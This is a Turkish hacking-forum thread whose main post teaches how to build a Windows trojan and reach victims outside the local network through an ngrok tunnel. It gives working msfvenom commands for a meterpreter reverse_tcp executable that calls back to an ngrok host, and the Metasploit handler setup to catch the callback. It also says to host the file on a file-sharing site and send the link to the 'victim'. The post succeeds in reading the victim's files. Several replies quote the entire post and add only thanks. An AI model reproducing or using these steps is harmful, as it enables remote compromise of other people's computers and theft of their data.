ngrok ile dış ağa Trojen yapımı

19 Şub 2021
123
1
68
Merhabalar TürkHackTeam üyeleri
bu konumuzda
ngrok kullanarak adaptöre gerek kalmadan dış ağa trojen yapımını anlatacağım.
ilk önce ngrok sitesine gidip hesap oluşturuyoruz.

bsf8sq6.PNG

hesap oluşturduk'tan sonra gelen ekrandan linux için indirmemiz gerekiyor.

48xscxm.PNG


ngrok'u linux'e zip olarak indirdikten sonra terminalimizi açıp indirdiğimiz yere giderek şu komutu giriyoruz;
unzip /dosyayolunuz/ngrok.zip
bu komutu yazdıktan sonrada ngrok sayfasındaki authtoken imizi yazacağız

n1s6o6b.PNG


bunun içinde şu kodu giriyoruz;
./ngrok authtoken tokeniniz

artık ngrok kurulumuyla işimiz kalmadı trojende kullanmaya geçelim.

ilk önce yazmamız gereken kod;

./ngrok tcp 4444

7fbdvd2.PNG

siz 4444 kısmını istediğinizi koyabilirsiniz herhangi bir sorun çıkmaz.

ardından yeni terminal açıp msfvenom ile bir trojen oluşturalım
bunun için gerekli kodu yazalım;


msfvenom --payload windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19143 -f exe -o thtdeneme.exe
evet şuan trojenimizi oluşturduk sıra msfconsole ile dinlemeye başlayalım

msfconsole açtıktan sonra sırasıyla kodumuzu giriyoruz kodumuzu giriyoruz;

1-) use exploit/multi/handler 2-) set PAYLOAD windows/meterpreter/reverse_tcp 3-) show options


j5np1ru.PNG


gördüğünüz üzere istediği değerler yazıyor buradada LHOST değerimizi girelim
set LHOST 0.0.0.0
yazmamız yeterli olucaktır.
şimdi de
run yazmadan önce dosyamızı karşı taraf yükleyebilmesi için
dosya.tc 'ye yükleyelim.
45cl1td.PNG


buradan browse kısmına tıklayarak yaptıgımız trojeni seçip yükleye basıyoruz ve verdiği linki alıyoruz

ben şuan öğretmek amaçlı yaptığım için herhangi bir ikon değişme veya uzantı değişme gibi şeyler yapmayacağım

her neyse şimdi verdiği linki kurbana atıyoruz ben burada sanal windows 10 kullanacağım işlem için ben
burayı tercih ettim

5kr0kdj.PNG


buradan Start Free Trial diyerek 30 dakikalık ücretsiz sürümle kullanabilirsiniz ancak vpn kullanırsanız sürekli kullanabilirsiniz
kurbana linki atmadan
msfconsole'dan run demeyi unutmuyoruz.

makinayı başlattım ve bize verdiği linkten dosyayı indiriyorum
mwvrfto.PNG


gördüğünüz üzere dosya indi ve çift tıklayarak dosyayı açıyorum.
esb5kp0.PNG

gördüğünüz üzere bağlantımız geldi ve .txt yi okumayı başarabildik.

ilk defa anlatımlı konu açıyorum dolayısıyla hatalarım olabilir bilgilendirirseniz sevinirim.

 

CasPeRAB

Uzman üye
7 Kas 2021
1,146
2
461
TR❤AZ
Merhabalar TürkHackTeam üyeleri
bu konumuzda
ngrok kullanarak adaptöre gerek kalmadan dış ağa trojen yapımını anlatacağım.
ilk önce ngrok sitesine gidip hesap oluşturuyoruz.

bsf8sq6.PNG


hesap oluşturduk'tan sonra gelen ekrandan linux için indirmemiz gerekiyor.

48xscxm.PNG


ngrok'u linux'e zip olarak indirdikten sonra terminalimizi açıp indirdiğimiz yere giderek şu komutu giriyoruz;
unzip /dosyayolunuz/ngrok.zip
bu komutu yazdıktan sonrada ngrok sayfasındaki authtoken imizi yazacağız

n1s6o6b.PNG


bunun içinde şu kodu giriyoruz;
./ngrok authtoken tokeniniz

artık ngrok kurulumuyla işimiz kalmadı trojende kullanmaya geçelim.

ilk önce yazmamız gereken kod;

./ngrok tcp 4444

7fbdvd2.PNG

siz 4444 kısmını istediğinizi koyabilirsiniz herhangi bir sorun çıkmaz.

ardından yeni terminal açıp msfvenom ile bir trojen oluşturalım
bunun için gerekli kodu yazalım;


msfvenom --payload windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19143 -f exe -o thtdeneme.exe
evet şuan trojenimizi oluşturduk sıra msfconsole ile dinlemeye başlayalım

msfconsole açtıktan sonra sırasıyla kodumuzu giriyoruz kodumuzu giriyoruz;

1-) use exploit/multi/handler 2-) set PAYLOAD windows/meterpreter/reverse_tcp 3-) show options


j5np1ru.PNG


gördüğünüz üzere istediği değerler yazıyor buradada LHOST değerimizi girelim
set LHOST 0.0.0.0
yazmamız yeterli olucaktır.
şimdi de
run yazmadan önce dosyamızı karşı taraf yükleyebilmesi için
dosya.tc 'ye yükleyelim.
45cl1td.PNG


buradan browse kısmına tıklayarak yaptıgımız trojeni seçip yükleye basıyoruz ve verdiği linki alıyoruz

ben şuan öğretmek amaçlı yaptığım için herhangi bir ikon değişme veya uzantı değişme gibi şeyler yapmayacağım

her neyse şimdi verdiği linki kurbana atıyoruz ben burada sanal windows 10 kullanacağım işlem için ben
burayı tercih ettim

5kr0kdj.PNG


buradan Start Free Trial diyerek 30 dakikalık ücretsiz sürümle kullanabilirsiniz ancak vpn kullanırsanız sürekli kullanabilirsiniz
kurbana linki atmadan
msfconsole'dan run demeyi unutmuyoruz.

makinayı başlattım ve bize verdiği linkten dosyayı indiriyorum
mwvrfto.PNG


gördüğünüz üzere dosya indi ve çift tıklayarak dosyayı açıyorum.
esb5kp0.PNG

gördüğünüz üzere bağlantımız geldi ve .txt yi okumayı başarabildik.

ilk defa anlatımlı konu açıyorum dolayısıyla hatalarım olabilir bilgilendirirseniz sevinirim.

Elinize Sağlık
 

METE _HAN

Katılımcı Üye
16 Eyl 2021
895
8
565
root💀kali
Merhabalar TürkHackTeam üyeleri
bu konumuzda
ngrok kullanarak adaptöre gerek kalmadan dış ağa trojen yapımını anlatacağım.
ilk önce ngrok sitesine gidip hesap oluşturuyoruz.

bsf8sq6.PNG


hesap oluşturduk'tan sonra gelen ekrandan linux için indirmemiz gerekiyor.

48xscxm.PNG


ngrok'u linux'e zip olarak indirdikten sonra terminalimizi açıp indirdiğimiz yere giderek şu komutu giriyoruz;
unzip /dosyayolunuz/ngrok.zip
bu komutu yazdıktan sonrada ngrok sayfasındaki authtoken imizi yazacağız

n1s6o6b.PNG


bunun içinde şu kodu giriyoruz;
./ngrok authtoken tokeniniz

artık ngrok kurulumuyla işimiz kalmadı trojende kullanmaya geçelim.

ilk önce yazmamız gereken kod;

./ngrok tcp 4444

7fbdvd2.PNG

siz 4444 kısmını istediğinizi koyabilirsiniz herhangi bir sorun çıkmaz.

ardından yeni terminal açıp msfvenom ile bir trojen oluşturalım
bunun için gerekli kodu yazalım;


msfvenom --payload windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19143 -f exe -o thtdeneme.exe
evet şuan trojenimizi oluşturduk sıra msfconsole ile dinlemeye başlayalım

msfconsole açtıktan sonra sırasıyla kodumuzu giriyoruz kodumuzu giriyoruz;

1-) use exploit/multi/handler 2-) set PAYLOAD windows/meterpreter/reverse_tcp 3-) show options


j5np1ru.PNG


gördüğünüz üzere istediği değerler yazıyor buradada LHOST değerimizi girelim
set LHOST 0.0.0.0
yazmamız yeterli olucaktır.
şimdi de
run yazmadan önce dosyamızı karşı taraf yükleyebilmesi için
dosya.tc 'ye yükleyelim.
45cl1td.PNG


buradan browse kısmına tıklayarak yaptıgımız trojeni seçip yükleye basıyoruz ve verdiği linki alıyoruz

ben şuan öğretmek amaçlı yaptığım için herhangi bir ikon değişme veya uzantı değişme gibi şeyler yapmayacağım

her neyse şimdi verdiği linki kurbana atıyoruz ben burada sanal windows 10 kullanacağım işlem için ben
burayı tercih ettim

5kr0kdj.PNG


buradan Start Free Trial diyerek 30 dakikalık ücretsiz sürümle kullanabilirsiniz ancak vpn kullanırsanız sürekli kullanabilirsiniz
kurbana linki atmadan
msfconsole'dan run demeyi unutmuyoruz.

makinayı başlattım ve bize verdiği linkten dosyayı indiriyorum
mwvrfto.PNG


gördüğünüz üzere dosya indi ve çift tıklayarak dosyayı açıyorum.
esb5kp0.PNG

gördüğünüz üzere bağlantımız geldi ve .txt yi okumayı başarabildik.

ilk defa anlatımlı konu açıyorum dolayısıyla hatalarım olabilir bilgilendirirseniz sevinirim.

Ellerinize sağlık..Gerçekten kaliteli bir konu olmuş
 

trombolol33001

Katılımcı Üye
19 Kas 2021
420
1
142
18
Merhabalar TürkHackTeam üyeleri
bu konumuzda
ngrok kullanarak adaptöre gerek kalmadan dış ağa trojen yapımını anlatacağım.
ilk önce ngrok sitesine gidip hesap oluşturuyoruz.

bsf8sq6.PNG


hesap oluşturduk'tan sonra gelen ekrandan linux için indirmemiz gerekiyor.

48xscxm.PNG


ngrok'u linux'e zip olarak indirdikten sonra terminalimizi açıp indirdiğimiz yere giderek şu komutu giriyoruz;
unzip /dosyayolunuz/ngrok.zip
bu komutu yazdıktan sonrada ngrok sayfasındaki authtoken imizi yazacağız

n1s6o6b.PNG


bunun içinde şu kodu giriyoruz;
./ngrok authtoken tokeniniz

artık ngrok kurulumuyla işimiz kalmadı trojende kullanmaya geçelim.

ilk önce yazmamız gereken kod;

./ngrok tcp 4444

7fbdvd2.PNG

siz 4444 kısmını istediğinizi koyabilirsiniz herhangi bir sorun çıkmaz.

ardından yeni terminal açıp msfvenom ile bir trojen oluşturalım
bunun için gerekli kodu yazalım;


msfvenom --payload windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19143 -f exe -o thtdeneme.exe
evet şuan trojenimizi oluşturduk sıra msfconsole ile dinlemeye başlayalım

msfconsole açtıktan sonra sırasıyla kodumuzu giriyoruz kodumuzu giriyoruz;

1-) use exploit/multi/handler 2-) set PAYLOAD windows/meterpreter/reverse_tcp 3-) show options


j5np1ru.PNG


gördüğünüz üzere istediği değerler yazıyor buradada LHOST değerimizi girelim
set LHOST 0.0.0.0
yazmamız yeterli olucaktır.
şimdi de
run yazmadan önce dosyamızı karşı taraf yükleyebilmesi için
dosya.tc 'ye yükleyelim.
45cl1td.PNG


buradan browse kısmına tıklayarak yaptıgımız trojeni seçip yükleye basıyoruz ve verdiği linki alıyoruz

ben şuan öğretmek amaçlı yaptığım için herhangi bir ikon değişme veya uzantı değişme gibi şeyler yapmayacağım

her neyse şimdi verdiği linki kurbana atıyoruz ben burada sanal windows 10 kullanacağım işlem için ben
burayı tercih ettim

5kr0kdj.PNG


buradan Start Free Trial diyerek 30 dakikalık ücretsiz sürümle kullanabilirsiniz ancak vpn kullanırsanız sürekli kullanabilirsiniz
kurbana linki atmadan
msfconsole'dan run demeyi unutmuyoruz.

makinayı başlattım ve bize verdiği linkten dosyayı indiriyorum
mwvrfto.PNG


gördüğünüz üzere dosya indi ve çift tıklayarak dosyayı açıyorum.
esb5kp0.PNG

gördüğünüz üzere bağlantımız geldi ve .txt yi okumayı başarabildik.

ilk defa anlatımlı konu açıyorum dolayısıyla hatalarım olabilir bilgilendirirseniz sevinirim.

Elinize sağlık
 

egemizah

Katılımcı Üye
19 Şub 2021
864
5
429
Merhabalar TürkHackTeam üyeleri
bu konumuzda
ngrok kullanarak adaptöre gerek kalmadan dış ağa trojen yapımını anlatacağım.
ilk önce ngrok sitesine gidip hesap oluşturuyoruz.

bsf8sq6.PNG


hesap oluşturduk'tan sonra gelen ekrandan linux için indirmemiz gerekiyor.

48xscxm.PNG


ngrok'u linux'e zip olarak indirdikten sonra terminalimizi açıp indirdiğimiz yere giderek şu komutu giriyoruz;
unzip /dosyayolunuz/ngrok.zip
bu komutu yazdıktan sonrada ngrok sayfasındaki authtoken imizi yazacağız

n1s6o6b.PNG


bunun içinde şu kodu giriyoruz;
./ngrok authtoken tokeniniz

artık ngrok kurulumuyla işimiz kalmadı trojende kullanmaya geçelim.

ilk önce yazmamız gereken kod;

./ngrok tcp 4444

7fbdvd2.PNG

siz 4444 kısmını istediğinizi koyabilirsiniz herhangi bir sorun çıkmaz.

ardından yeni terminal açıp msfvenom ile bir trojen oluşturalım
bunun için gerekli kodu yazalım;


msfvenom --payload windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19143 -f exe -o thtdeneme.exe
evet şuan trojenimizi oluşturduk sıra msfconsole ile dinlemeye başlayalım

msfconsole açtıktan sonra sırasıyla kodumuzu giriyoruz kodumuzu giriyoruz;

1-) use exploit/multi/handler 2-) set PAYLOAD windows/meterpreter/reverse_tcp 3-) show options


j5np1ru.PNG


gördüğünüz üzere istediği değerler yazıyor buradada LHOST değerimizi girelim
set LHOST 0.0.0.0
yazmamız yeterli olucaktır.
şimdi de
run yazmadan önce dosyamızı karşı taraf yükleyebilmesi için
dosya.tc 'ye yükleyelim.
45cl1td.PNG


buradan browse kısmına tıklayarak yaptıgımız trojeni seçip yükleye basıyoruz ve verdiği linki alıyoruz

ben şuan öğretmek amaçlı yaptığım için herhangi bir ikon değişme veya uzantı değişme gibi şeyler yapmayacağım

her neyse şimdi verdiği linki kurbana atıyoruz ben burada sanal windows 10 kullanacağım işlem için ben
burayı tercih ettim

5kr0kdj.PNG


buradan Start Free Trial diyerek 30 dakikalık ücretsiz sürümle kullanabilirsiniz ancak vpn kullanırsanız sürekli kullanabilirsiniz
kurbana linki atmadan
msfconsole'dan run demeyi unutmuyoruz.

makinayı başlattım ve bize verdiği linkten dosyayı indiriyorum
mwvrfto.PNG


gördüğünüz üzere dosya indi ve çift tıklayarak dosyayı açıyorum.
esb5kp0.PNG

gördüğünüz üzere bağlantımız geldi ve .txt yi okumayı başarabildik.

ilk defa anlatımlı konu açıyorum dolayısıyla hatalarım olabilir bilgilendirirseniz sevinirim.

elinize saglık
 

Shafizada

Katılımcı Üye
22 Kas 2021
289
1
67
Azerbaijan, Sumqayit
Merhabalar TürkHackTeam üyeleri
bu konumuzda
ngrok kullanarak adaptöre gerek kalmadan dış ağa trojen yapımını anlatacağım.
ilk önce ngrok sitesine gidip hesap oluşturuyoruz.

bsf8sq6.PNG


hesap oluşturduk'tan sonra gelen ekrandan linux için indirmemiz gerekiyor.

48xscxm.PNG


ngrok'u linux'e zip olarak indirdikten sonra terminalimizi açıp indirdiğimiz yere giderek şu komutu giriyoruz;
unzip /dosyayolunuz/ngrok.zip
bu komutu yazdıktan sonrada ngrok sayfasındaki authtoken imizi yazacağız

n1s6o6b.PNG


bunun içinde şu kodu giriyoruz;
./ngrok authtoken tokeniniz

artık ngrok kurulumuyla işimiz kalmadı trojende kullanmaya geçelim.

ilk önce yazmamız gereken kod;

./ngrok tcp 4444

7fbdvd2.PNG

siz 4444 kısmını istediğinizi koyabilirsiniz herhangi bir sorun çıkmaz.

ardından yeni terminal açıp msfvenom ile bir trojen oluşturalım
bunun için gerekli kodu yazalım;


msfvenom --payload windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19143 -f exe -o thtdeneme.exe
evet şuan trojenimizi oluşturduk sıra msfconsole ile dinlemeye başlayalım

msfconsole açtıktan sonra sırasıyla kodumuzu giriyoruz kodumuzu giriyoruz;

1-) use exploit/multi/handler 2-) set PAYLOAD windows/meterpreter/reverse_tcp 3-) show options


j5np1ru.PNG


gördüğünüz üzere istediği değerler yazıyor buradada LHOST değerimizi girelim
set LHOST 0.0.0.0
yazmamız yeterli olucaktır.
şimdi de
run yazmadan önce dosyamızı karşı taraf yükleyebilmesi için
dosya.tc 'ye yükleyelim.
45cl1td.PNG


buradan browse kısmına tıklayarak yaptıgımız trojeni seçip yükleye basıyoruz ve verdiği linki alıyoruz

ben şuan öğretmek amaçlı yaptığım için herhangi bir ikon değişme veya uzantı değişme gibi şeyler yapmayacağım

her neyse şimdi verdiği linki kurbana atıyoruz ben burada sanal windows 10 kullanacağım işlem için ben
burayı tercih ettim

5kr0kdj.PNG


buradan Start Free Trial diyerek 30 dakikalık ücretsiz sürümle kullanabilirsiniz ancak vpn kullanırsanız sürekli kullanabilirsiniz
kurbana linki atmadan
msfconsole'dan run demeyi unutmuyoruz.

makinayı başlattım ve bize verdiği linkten dosyayı indiriyorum
mwvrfto.PNG


gördüğünüz üzere dosya indi ve çift tıklayarak dosyayı açıyorum.
esb5kp0.PNG

gördüğünüz üzere bağlantımız geldi ve .txt yi okumayı başarabildik.

ilk defa anlatımlı konu açıyorum dolayısıyla hatalarım olabilir bilgilendirirseniz sevinirim.

Teşekkürler
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.